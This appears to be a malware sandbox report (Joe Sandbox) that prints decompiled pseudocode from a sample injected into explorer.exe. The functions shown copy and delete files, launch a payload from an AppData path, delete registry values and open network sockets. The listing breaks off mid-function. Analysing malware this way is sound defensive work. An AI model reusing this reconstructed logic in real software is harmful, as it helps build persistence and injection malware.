CopyFileW.KERNEL32(?,01507415,00000000), ref: 0151BA9A
memset.MSVCRT(?,00000000,00000206), ref: 0151BAC4
MoveFileW.KERNEL32(01507415,?), ref: 0151BB0F
CopyFileW.KERNEL32(?,01507415,00000000), ref: 0151BB38
DeleteFileW.KERNEL32(?), ref: 0151BB5B
DeleteFileW.KERNEL32(?), ref: 0151BB67

Strings

%S.%06d, xrefs: 0151BAEB

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: File$CopyDelete$Movememset
String ID: %S.%06d
API String ID: 2550245804-2219224273
Opcode ID: 07aa75a50a281bbdbbb6d3c44dfc20973249d546c867fd062bbad2eb15aec676
Instruction ID: e82e00324ff0285f91cced66033ec80b709a4b403a0e94a667cdcd1915efebf3
Opcode Fuzzy Hash: 07aa75a50a281bbdbbb6d3c44dfc20973249d546c867fd062bbad2eb15aec676
Instruction Fuzzy Hash: 6A21A175A00209ABFB31DF65DC49FAE37B8BB44750F108958F6268F98CE7709A409751

Uniqueness

Uniqueness Score: 10.55%

Function 0150561A, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82
stringsynchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E0150561A(void* __ecx, void* __eflags) {
				void* _v8;
				char _v40;
				signed int _t14;
				long _t19;
				void* _t22;
				WCHAR* _t26;
				void* _t27;
				void* _t29;
				void* _t34;

				_t29 = __ecx;
				E01513940();
				E01515080(__eflags, 0);
				E0151E970();
				_t26 = E01513960(_t29, 0x20a);
				if(_t26 != 0) {
					lstrcpynW(_t26, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 0x20a);
					_t14 = E0151E480( *0x1537994,  *0x1537998, _t26,  &_v8);
					__eflags = _t14;
					if(_t14 >= 0) {
						__eflags = _v8;
						if(_v8 == 0) {
							L13:
							ExitProcess(0);
						}
						__eflags =  *0x1537990 & 0x00000001;
						if(( *0x1537990 & 0x00000001) != 0) {
							goto L13;
						}
						_t27 = 0;
						E01513C30( &_v40, 0x20, "p%08x",  *0x153798c);
						_t34 = CreateEventA(0, 0, 0,  &_v40);
						__eflags = _t34;
						if(_t34 != 0) {
							do {
								_t19 = WaitForSingleObject(_t34, 0x2710);
								__eflags = _t19;
								if(_t19 == 0) {
									_t27 = 1;
									__eflags = 1;
								}
								__eflags = _t27;
							} while (_t27 == 0);
							CloseHandle(_t34);
							_v8( *0x1537994, 0, 0);
							goto L13;
						}
						_t22 = 0xfffffffe;
						return _t22;
					}
					return _t14 | 0xffffffff;
				}
				return 1;
			}

0x0150561a
0x01505623
0x0150562b
0x01505630
0x01505640
0x01505646
0x01505657
0x0150566e
0x01505676
0x01505678
0x0150567f
0x01505682
0x015056e9
0x015056ea
0x015056ea
0x01505684
0x0150568b
0x00000000
0x00000000
0x0150569e
0x015056a0
0x015056b5
0x015056b7
0x015056b9
0x015056c0
0x015056c6
0x015056cc
0x015056ce
0x015056d2
0x015056d2
0x015056d2
0x015056d3
0x015056d3
0x015056d8
0x015056e6
0x00000000
0x015056e6
0x015056bd
0x00000000
0x015056bd
0x00000000
0x0150567a
0x00000000

APIs

Part of subcall function 01513940: HeapCreate.KERNEL32(00000000,00080000,00000000,?,015066A1), ref: 0151394C

Part of subcall function 01515080: memset.MSVCRT(?,00000000,0000003E), ref: 015150A6

Part of subcall function 0151E970: GetCurrentProcess.KERNEL32(?,01505635,00000000), ref: 0151E973
Part of subcall function 0151E970: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0151E997
Part of subcall function 0151E970: GetProcAddress.KERNEL32(00000000), ref: 0151E99E
Part of subcall function 0151E970: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\explorer.exe,00000105), ref: 0151E9B5
Part of subcall function 0151E970: GetVersionExA.KERNEL32(01538AA0), ref: 0151EA1C

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcpynW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe,0000020A), ref: 01505657
ExitProcess.KERNEL32 ref: 015056EA

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 015056AF
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 015056C6
CloseHandle.KERNEL32(00000000), ref: 015056D8

Strings

p%08x, xrefs: 01505696
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 01505651

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHandleHeapModuleProcess$AddressAllocCloseCurrentEventExitFileNameObjectProcSingleVersionWaitlstrcpynlstrlenmemsetwvnsprintf
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$p%08x
API String ID: 2415304340-2844983559
Opcode ID: 68907e2044454f0def593260fca4f4a6400773c7754e3a910e8bb45eea1fbc2e
Instruction ID: 62ce9608191cf685402c8b8e0070e7494815fe4ddd1cc12e03604503478d53f1
Opcode Fuzzy Hash: 68907e2044454f0def593260fca4f4a6400773c7754e3a910e8bb45eea1fbc2e
Instruction Fuzzy Hash: BA215773910215BAE7336AF4AD88D7F3A6DFBC6774B200520F5229A0C5F7609804AB61

Uniqueness

Uniqueness Score: 100.00%

Function 003FCA60, Relevance: 12.2, APIs: 8, Instructions: 191
registryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E003FCA60(void* _a4, short* _a8, WCHAR* _a12) {
				char _v5;
				int _v12;
				int _v16;
				int _v20;
				void* _v24;
				char* _v28;
				int _v32;
				int _v36;
				int* _v40;
				void _v562;
				short _v564;
				int _v568;
				short* _v572;
				long _v576;
				int* _v580;
				struct _FILETIME _v588;
				int _v592;
				int _v596;
				long _v600;
				short _t61;
				short* _t63;
				char* _t64;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;

				_v580 = 0;
				_v24 = 0;
				_t61 =  *0x405240; // 0x0
				_v564 = _t61;
				_t93 =  &_v562;
				memset( &_v562, 0, 0x206);
				_t124 = _t123 + 0xc;
				_v32 = 0x104;
				_v40 = 0;
				_v568 = 0x3fff;
				_v12 = 0;
				_v5 = 0;
				while(0 != 0) {
				}
				_t63 = E003F3EE0(_t93, 0x3fff);
				_t125 = _t124 + 4;
				_v572 = _t63;
				if(_v572 != 0) {
					_t64 = E003F3EE0(_t93, 0x800);
					_t126 = _t125 + 4;
					_v28 = _t64;
					if(_v28 != 0) {
						_v576 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v24);
						if(_v576 == 0) {
							while(0 != 0) {
							}
							_v576 = RegQueryInfoKeyW(_v24,  &_v564,  &_v32, 0, 0, 0, 0,  &_v596,  &_v592,  &_v36,  &_v16,  &_v588);
							if(_v576 == 0) {
								if(_v596 == 0) {
									L37:
									while(0 != 0) {
									}
									L39:
									if(_v24 != 0) {
										RegCloseKey(_v24);
									}
									E003F3F10( &_v572, 0x3fff);
									E003F3F10( &_v28, 0x800);
									while(0 != 0) {
									}
									return _v580;
								}
								_v20 = 0;
								_v576 = 0;
								while(_v20 < _v596) {
									E003F4120(_v28, _v28, 0, 0x800);
									E003F4120(_v28, _v572, 0, 0x3fff);
									_t126 = _t126 + 0x18;
									_v568 = 0x3fff;
									_v12 = 0x800;
									 *_v572 = 0;
									_v576 = RegEnumValueW(_v24, _v20, _v572,  &_v568, 0, 0, _v28,  &_v12);
									if(_v576 != 0) {
										while(0 != 0) {
										}
										L23:
										_v20 = _v20 + 1;
										continue;
									}
									if(StrStrIW(_v28, _a12) == 0) {
										L32:
										goto L23;
									}
									while(0 != 0) {
									}
									_v600 = RegDeleteValueW(_v24, _v572);
									if(_v600 == 0) {
										goto L32;
									}
									while(0 != 0) {
									}
									goto L32;
								}
								goto L37;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v24);
							goto L39;
						}
						while(0 != 0) {
						}
						goto L39;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003fca69
0x003fca73
0x003fca7a
0x003fca80
0x003fca8e
0x003fca95
0x003fca9a
0x003fca9d
0x003fcaa4
0x003fcaab
0x003fcab5
0x003fcabc
0x003fcac0
0x003fcac4
0x003fcacb
0x003fcad0
0x003fcad3
0x003fcae0
0x003fcaf4
0x003fcaf9
0x003fcafc
0x003fcb03
0x003fcb2b
0x003fcb38
0x003fcb45
0x003fcb49
0x003fcb85
0x003fcb92
0x003fcbb0
0x00000000
0x003fccad
0x003fccb1
0x003fccb3
0x003fccb7
0x003fccbd
0x003fccbd
0x003fcccf
0x003fcce0
0x003fcce8
0x003fccec
0x00000000
0x003fccee
0x003fcbb6
0x003fcbbd
0x003fcbd2
0x003fcbec
0x003fcc02
0x003fcc07
0x003fcc0a
0x003fcc14
0x003fcc23
0x003fcc4e
0x003fcc5b
0x003fcc9d
0x003fcca1
0x003fcbc9
0x003fcbcf
0x00000000
0x003fcbcf
0x003fcc6d
0x003fcc9b
0x00000000
0x003fcca8
0x003fcc6f
0x003fcc73
0x003fcc86
0x003fcc93
0x00000000
0x00000000
0x003fcc95
0x003fcc99
0x00000000
0x003fcc95
0x00000000
0x003fcbd2
0x003fcb94
0x003fcb98
0x003fcb9e
0x00000000
0x003fcb9e
0x003fcb3a
0x003fcb3e
0x00000000
0x003fcb40
0x003fcb05
0x003fcb09
0x00000000
0x003fcb0b
0x003fcae2
0x003fcae6
0x00000000

APIs

memset.MSVCRT(?,00000000,00000206), ref: 003FCA95

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

RegOpenKeyExW.ADVAPI32(00000000,80000001,00000000,00020019,00000000), ref: 003FCB25
RegQueryInfoKeyW.ADVAPI32(00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,?,80000001,?), ref: 003FCB7F
RegCloseKey.ADVAPI32(00000000), ref: 003FCB9E
RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00003FFF,00000000,00000000,00000000,00000800), ref: 003FCC48
StrStrIW.SHLWAPI(00000000,00000000), ref: 003FCC65
RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 003FCC80
RegCloseKey.ADVAPI32(00000000), ref: 003FCCBD

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseValue$AllocDeleteEnumHeapInfoOpenQuerymemset
String ID:
API String ID: 3113492093-0
Opcode ID: f3633a945efcc55bfd3472f3ee51b6689b3590a76a3cf6c351e79c58e66433f4
Instruction ID: 434a01fc938dfd33a11df9290cd8f9b9f3afc0491540c016db48c91e620cd47e
Opcode Fuzzy Hash: f3633a945efcc55bfd3472f3ee51b6689b3590a76a3cf6c351e79c58e66433f4
Instruction Fuzzy Hash: C771C1B5D6020D9BDB26DB90CE89BFEB778AF44300F1055A9E30AAA180D7785F85CF51

Uniqueness

Uniqueness Score: 6.12%

Function 0150584E, Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 169
UNIQUE

Download Yara Rule

C-Code - Quality: 96%

			E0150584E(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				void* _v44;
				void* _v48;
				char _t72;
				signed int _t74;
				void* _t78;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				intOrPtr _t108;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t128;
				signed int _t132;
				signed int _t133;
				void* _t134;

				_t132 = 0;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_t72 = E0151C070(_a8,  &_v20);
				_v24 = _t72;
				if(_t72 != 0) {
					_v16 = 0;
					_v12 = 0;
					_v28 = 0;
					_t74 = E0151F510( &_v12);
					_pop(_t112);
					_v16 = _t74;
					__eflags = _t74;
					if(_t74 != 0) {
						_t108 = _a4;
						__eflags = _v12;
						if(_v12 > 0) {
							do {
								_t93 = E0151B7B0(_t112,  *((intOrPtr*)(_v16 + _t132 * 4)),  &_v48);
								_pop(_t112);
								__eflags = _t93;
								if(_t93 != 0) {
									goto L12;
								} else {
									_t112 = _a16;
									 *0x1537998 = _v20;
									 *0x153798c = _t108;
									 *0x1537990 = _a16;
									_t95 = E0151B720(_v48, _v24, _v20);
									_t134 = _t134 + 0xc;
									 *0x1537994 = _t95;
									__eflags = _t95;
									if(_t95 != 0) {
										_t97 = E0151F6A0(_t112, E0150561A,  &_v48,  *0x1538eac);
										_t134 = _t134 + 0xc;
										__eflags = _t97;
										if(_t97 != 0) {
											_t99 = E0151F7F0(_t112,  &_v48);
											_pop(_t112);
											__eflags = _t99;
											if(__eflags != 0) {
												_v32 = E015057EC(__eflags, _v48);
												_v28 = 1;
											} else {
												CloseHandle(_v44);
												CloseHandle(_v48);
												_v8 = 0xfffffffc;
												goto L12;
											}
										} else {
											CloseHandle(_v44);
											CloseHandle(_v48);
											_v8 = 0xfffffffd;
											goto L12;
										}
									} else {
										CloseHandle(_v44);
										CloseHandle(_v48);
										_v8 = 0xfffffffe;
										goto L12;
									}
								}
								goto L15;
								L12:
								_t132 = _t132 + 1;
								__eflags = _t132 - _v12;
							} while (_t132 < _v12);
						}
						L15:
						_t133 = 0;
						__eflags = _v12;
						if(_v12 > 0) {
							do {
								E01513990(_v16 + _t133 * 4, 0xfffffffe);
								_t133 = _t133 + 1;
								__eflags = _t133 - _v12;
							} while (_t133 < _v12);
						}
						_t78 = E01513990( &_v16, _v12 << 2);
						__eflags = _v28;
						if(_v28 != 0) {
							__eflags = _a16 & 0x00000001;
							if((_a16 & 0x00000001) != 0) {
								L24:
								CloseHandle(_v44);
							} else {
								_t83 = E01505717(_t78, _t108);
								__eflags = _t83;
								if(_t83 >= 0) {
									L23:
									_t118 =  *0x153a97c; // 0x0
									_t84 = _t83 + _t83;
									__eflags = _t84;
									 *((intOrPtr*)(_t118 + _t84 * 8)) = _t108;
									_t119 =  *0x153a97c; // 0x0
									 *((intOrPtr*)(_t119 + 4 + _t84 * 8)) = 1;
									_t120 =  *0x153a97c; // 0x0
									 *((intOrPtr*)(_t120 + 0xc + _t84 * 8)) = _v32;
									_t128 =  *0x153a97c; // 0x0
									 *(_t128 + 8 + _t84 * 8) = _v48;
									goto L24;
								} else {
									_t85 =  *0x153a978; // 0x0
									_t53 = (_t85 << 4) + 0x10; // 0x10
									_t87 = E01513A40(_t53, 0x153a97c, _t85 << 4, _t53);
									__eflags = _t87;
									if(_t87 != 0) {
										_t83 =  *0x153a978; // 0x0
										 *0x153a978 =  *0x153a978 + 1;
										__eflags =  *0x153a978;
										goto L23;
									}
								}
							}
						} else {
							_v8 = 0xfffffffb;
						}
					} else {
						_v8 = _v8 | 0xffffffff;
					}
				} else {
					_v8 = 0xfffffffe;
				}
				E01513990( &_v24, _v20);
				return _v8;
			}

0x01505858
0x0150585e
0x01505861
0x01505864
0x01505867
0x0150586a
0x01505871
0x01505876
0x01505888
0x0150588b
0x0150588e
0x01505891
0x01505896
0x01505897
0x0150589a
0x0150589c
0x015058a8
0x015058b2
0x015058b5
0x015058bb
0x015058c5
0x015058cb
0x015058cc
0x015058ce
0x00000000
0x015058d4
0x015058d7
0x015058de
0x015058e6
0x015058ec
0x015058f2
0x015058f7
0x015058fa
0x015058ff
0x01505901
0x01505925
0x0150592a
0x0150592d
0x0150592f
0x01505948
0x0150594d
0x0150594e
0x01505950
0x01505978
0x0150597b
0x01505952
0x01505955
0x0150595a
0x0150595c
0x00000000
0x0150595c
0x01505931
0x01505934
0x01505939
0x0150593b
0x00000000
0x0150593b
0x01505903
0x01505906
0x0150590b
0x0150590d
0x00000000
0x0150590d
0x01505901
0x00000000
0x01505963
0x01505963
0x01505964
0x01505964
0x0150596d
0x01505982
0x01505982
0x01505984
0x01505987
0x01505989
0x01505992
0x01505997
0x0150599a
0x0150599a
0x01505989
0x015059aa
0x015059af
0x015059b5
0x015059c0
0x015059c4
0x01505a2d
0x01505a30
0x015059c6
0x015059c7
0x015059cd
0x015059cf
0x015059fa
0x015059fa
0x01505a03
0x01505a03
0x01505a05
0x01505a08
0x01505a0e
0x01505a16
0x01505a1c
0x01505a23
0x01505a29
0x00000000
0x015059d1
0x015059d1
0x015059d9
0x015059e3
0x015059eb
0x015059ed
0x015059ef
0x015059f4
0x015059f4
0x00000000
0x015059f4
0x015059ed
0x015059cf
0x015059b7
0x015059b7
0x015059b7
0x0150589e
0x0150589e
0x0150589e
0x01505878
0x01505878
0x01505878
0x01505a3b
0x01505a47

Strings

X, xrefs: 015059E3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: X
API String ID: 1659193697-298166547
Opcode ID: 4d4ba756cb245edf1838be36b252ddedc4929f176f61165b6cf83c3756e18095
Instruction ID: 703c23cee7426f8b1cef0f19e277f34cc683d0ed690909ab4395e3eb4551ba6e
Opcode Fuzzy Hash: 4d4ba756cb245edf1838be36b252ddedc4929f176f61165b6cf83c3756e18095
Instruction Fuzzy Hash: 8C515076C0021AEFDF12DFA8D8449ADBBB4FB48324F21855AE460FB294E7319A45DF50

Uniqueness

Uniqueness Score: 100.00%

Function 015160D0, Relevance: 12.1, APIs: 8, Instructions: 80UNIQUE

Download Yara Rule

APIs

#23.WS2_32(00000002,00000001,00000006,?,?,?,01509EBF,00000000), ref: 015160F8
#10.WS2_32(000000FF,8004667E,00000001,?,?,?,01509EBF,00000000), ref: 0151611C
#111.WS2_32(?,?,?,01509EBF,00000000), ref: 01516126
#3.WS2_32(000000FF,?,?,?,?,?,?,01509EBF,00000000), ref: 015161CA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 0935fadbbdf1824b2f1310db5ca0de1df007c49b7b4e24e29365a8e71271ffcf
Instruction ID: 341b604608908272a081968d0b872a6828f0016f5b42e24f31bec56930567254
Opcode Fuzzy Hash: 0935fadbbdf1824b2f1310db5ca0de1df007c49b7b4e24e29365a8e71271ffcf
Instruction Fuzzy Hash: 99316D75D40219EBEB30DFA4CC48BAEB7B4BB4A320F104759E531AB2C5D7B59A04DB50

Uniqueness

Uniqueness Score: 100.00%

Function 015133B8, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E015133B8(intOrPtr* _a4, void* _a8, int _a12) {
				void* _t27;
				signed int _t28;
				void* _t31;
				void* _t33;
				char* _t35;
				char* _t39;
				void* _t40;
				int _t41;
				intOrPtr* _t42;
				void* _t43;

				_t42 = _a4;
				_t35 = "psAssert %s";
				_t39 = ":%d ";
				if(_t42 == 0) {
					_push("crypto\\digest\\sha256.c");
					_push(_t35);
					_t33 = E01510CBC(_t27);
					_push(0xf8);
					_push(_t39);
					E01510CBC(_t33);
					_t27 = E01510B84("md != NULL");
					_t43 = _t43 + 0x14;
				}
				if(_a8 == 0) {
					_push("crypto\\digest\\sha256.c");
					_push(_t35);
					_t31 = E01510CBC(_t27);
					_push(0xf9);
					_push(_t39);
					E01510CBC(_t31);
					_t27 = E01510B84("buf != NULL");
					_t43 = _t43 + 0x14;
				}
				while(_a12 > 0) {
					_t28 =  *(_t42 + 0x28);
					if(_t28 != 0 || _a12 < 0x40) {
						_t40 = 0x40;
						_t41 = _t40 - _t28;
						if(_a12 < _t41) {
							_t41 = _a12;
						}
						_t27 = memcpy(_t28 + _t42 + 0x2c, _a8, _t41);
						 *(_t42 + 0x28) =  *(_t42 + 0x28) + _t41;
						_a8 = _a8 + _t41;
						_a12 = _a12 - _t41;
						_t43 = _t43 + 0xc;
						if( *(_t42 + 0x28) == 0x40) {
							_t27 = E01513321(_t42, _t42 + 0x2c);
							 *_t42 =  *_t42 + 0x200;
							asm("adc dword [esi+0x4], 0x0");
							 *(_t42 + 0x28) =  *(_t42 + 0x28) & 0x00000000;
							goto L13;
						}
					} else {
						_t27 = E01513321(_t42, _a8);
						 *_t42 =  *_t42 + 0x200;
						asm("adc dword [esi+0x4], 0x0");
						_a8 = _a8 + 0x40;
						_a12 = _a12 - 0x40;
						L13:
					}
				}
				return _t27;
			}

0x015133bd
0x015133c1
0x015133c6
0x015133cd
0x015133cf
0x015133d4
0x015133d5
0x015133da
0x015133df
0x015133e0
0x015133ea
0x015133ef
0x015133ef
0x015133f6
0x015133f8
0x015133fd
0x015133fe
0x01513403
0x01513408
0x01513409
0x01513413
0x01513418
0x01513418
0x0151341f
0x01513426
0x0151342b
0x0151344e
0x0151344f
0x01513454
0x01513456
0x01513456
0x01513462
0x01513467
0x0151346a
0x0151346d
0x01513470
0x01513477
0x0151347e
0x01513483
0x01513485
0x01513489
0x00000000
0x01513489
0x01513433
0x01513437
0x0151343c
0x0151343e
0x01513442
0x01513446
0x0151348d
0x0151348e
0x0151348f
0x01513499

APIs

memcpy.MSVCRT(?,00000000,00000040,?,?,00000040,?,01510F01,?,?,00000040,?), ref: 01513462

Strings

crypto\digest\sha256.c, xrefs: 015133CF, 015133F8
psAssert %s, xrefs: 015133C1, 015133D4, 015133FD
buf != NULL, xrefs: 0151340E
@, xrefs: 01513442
@, xrefs: 01513446
:%d , xrefs: 015133C6, 015133DF, 01513408
md != NULL, xrefs: 015133E5

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: :%d $@$@$buf != NULL$crypto\digest\sha256.c$md != NULL$psAssert %s
API String ID: 3510742995-2040793410
Opcode ID: b061f5eb245d916abcc88dc02eee00606e14d84000e7161bca5b8e699b4230a0
Instruction ID: 829aea5a24de8586a46ccb9e52cdb03e2d0674a26bf7c824e719a8bfe4202176
Opcode Fuzzy Hash: b061f5eb245d916abcc88dc02eee00606e14d84000e7161bca5b8e699b4230a0
Instruction Fuzzy Hash: D521057254030AABEB63AE55C884B9F73A8FF51634F00842EFD051E085EBF4D9848B95

Uniqueness

Uniqueness Score: 10.55%

Function 003FDEC0, Relevance: 12.1, APIs: 8, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E003FDEC0(intOrPtr _a4, WCHAR* _a8) {
				void* _v8;
				void _v530;
				short _v532;
				int _v536;
				void _v1058;
				char _v1060;
				short _t19;
				int* _t24;
				intOrPtr* _t38;
				short _t39;
				void* _t44;

				_v536 = 0x104;
				_t19 =  *0x405240; // 0x0
				_v1060 = _t19;
				memset( &_v1058, 0, 0x206);
				_t39 =  *0x405240; // 0x0
				_v532 = _t39;
				memset( &_v530, 0, 0x206);
				__imp__SHGetFolderPathW(0, _a4, 0, 1,  &_v1060);
				_v8 = E003F7230( &_v1060, 8);
				_t24 =  &_v536;
				__imp__GetUserProfileDirectoryW(_v8,  &_v532, _t24);
				if(_t24 != 0) {
					L5:
					CloseHandle(_v8);
					lstrcpynW(_a8, _t44 + lstrlenW( &_v532) * 2 - 0x41e, 0x104);
					return 1;
				}
				while(0 != 0) {
				}
				_t38 =  *0x40f864; // 0x161f7d0
				if(E003F7660( *_t38) != 0) {
					__imp__SHGetFolderPathW(0, 0x24, 0, 1,  &_v532);
				}
				goto L5;
			}

0x003fdec9
0x003fded3
0x003fded9
0x003fdeee
0x003fdef6
0x003fdefd
0x003fdf12
0x003fdf2b
0x003fdf3b
0x003fdf3e
0x003fdf50
0x003fdf58
0x003fdf8a
0x003fdf8e
0x003fdfb2
0x003fdfc0
0x003fdfc0
0x003fdf5a
0x003fdf5e
0x003fdf60
0x003fdf73
0x003fdf84
0x003fdf84
0x00000000

APIs

memset.MSVCRT(?,00000000,00000206), ref: 003FDEEE
memset.MSVCRT(?,00000000,00000206), ref: 003FDF12
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000001,?), ref: 003FDF2B

Part of subcall function 003F7230: GetCurrentThread.KERNEL32(003F7583,00000000,00000008,?,?,003F7583,00000008), ref: 003F723E
Part of subcall function 003F7230: OpenThreadToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F7245
Part of subcall function 003F7230: GetLastError.KERNEL32(?,?,003F7583,00000008), ref: 003F724F
Part of subcall function 003F7230: GetCurrentProcess.KERNEL32(003F7583,00000008,?,?,003F7583,00000008), ref: 003F7264
Part of subcall function 003F7230: OpenProcessToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F726B

GetUserProfileDirectoryW.USERENV(?,?,?), ref: 003FDF50
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000001,?), ref: 003FDF84
CloseHandle.KERNEL32(?), ref: 003FDF8E
lstrlenW.KERNEL32(?,00000104), ref: 003FDFA0
lstrcpynW.KERNEL32(?,?), ref: 003FDFB2

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentFolderOpenPathProcessThreadTokenmemset$CloseDirectoryErrorHandleLastProfileUserlstrcpynlstrlen
String ID:
API String ID: 1387508236-0
Opcode ID: 587e68980dff4594de282a75ed5d3e4d1b91fbee894eb6da5cacbbc5870305a1
Instruction ID: 257a959c35555bd146c92ba64afc1cb3d9743c5bbb3cd54317a30a4c948732f7
Opcode Fuzzy Hash: 587e68980dff4594de282a75ed5d3e4d1b91fbee894eb6da5cacbbc5870305a1
Instruction Fuzzy Hash: 632153B5A5030CABDB20DB60DD49FFA7379EB58700F0045A8FB099A1D0E6B19A84CF95

Uniqueness

Uniqueness Score: 5.54%

Function 015226B0, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 279
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E015226B0(void* __eax, void* __ecx, intOrPtr _a4) {
				char _v8;
				signed int _v16;
				void* __esi;
				void* _t30;
				void* _t35;
				signed int _t45;
				signed int _t48;
				signed int _t55;
				signed int _t62;
				signed int _t65;
				signed int _t68;
				intOrPtr _t78;
				signed int _t80;
				signed int _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				signed int _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t104;
				void* _t105;

				_t81 = __ecx;
				_t30 = __eax;
				_t78 = _a4;
				_t99 = __ecx;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0xffffffff;
				if(__eax == 0x2d) {
					_t98 = E01522020(__ecx, __ecx, _t78);
					_t100 = _t100 + 4;
					if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
						E01524A40(__ecx + 0x28, _t98);
						_t100 = _t100 + 8;
					}
					_t30 = _t98;
				}
				if(_t30 != 0x30) {
					_t5 = _t30 - 0x30; // -48
					__eflags = _t5 - 9;
					if(_t5 > 9) {
						goto L12;
					} else {
						do {
							_t92 = E01522020(_t99, _t81, _t78);
							_t100 = _t100 + 4;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								__eflags = _t92 - 0xfffffffe;
								if(_t92 != 0xfffffffe) {
									E01524A40(_t99 + 0x28, _t92);
									_t100 = _t100 + 8;
								}
							}
							_t35 = _t92;
							__eflags = _t92 - 0x30;
							if(_t92 >= 0x30) {
								goto L18;
							}
							goto L19;
							L18:
							__eflags = _t92 - 0x39;
						} while (_t92 <= 0x39);
						goto L19;
					}
				} else {
					_t93 = E01522020(_t99, _t81, _t78);
					_t100 = _t100 + 4;
					if(_t93 != 0xffffffff && _t93 != 0xfffffffe) {
						_t81 = _t99 + 0x28;
						E01524A40(_t99 + 0x28, _t93);
						_t100 = _t100 + 8;
					}
					_t35 = _t93;
					if(_t93 < 0x30 || _t93 > 0x39) {
						L19:
						__eflags =  *(_t99 + 0x34) & 0x00000008;
						if(( *(_t99 + 0x34) & 0x00000008) != 0) {
							L30:
							__eflags = _t35 - 0x2e;
							if(_t35 != 0x2e) {
								goto L39;
							} else {
								goto L31;
							}
						} else {
							__eflags = _t35 - 0x2e;
							if(_t35 == 0x2e) {
								L31:
								_t17 = E01522020(_t99, _t81, _t78) - 0x30; // -48
								_t104 = _t100 + 4;
								__eflags = _t17 - 9;
								if(_t17 > 9) {
									_t55 = E01522170(_t53, _t99) | 0xffffffff;
									__eflags = _t55;
									return _t55;
								} else {
									_t79 = _t99 + 0x28;
									E01524A40(_t99 + 0x28, _t53);
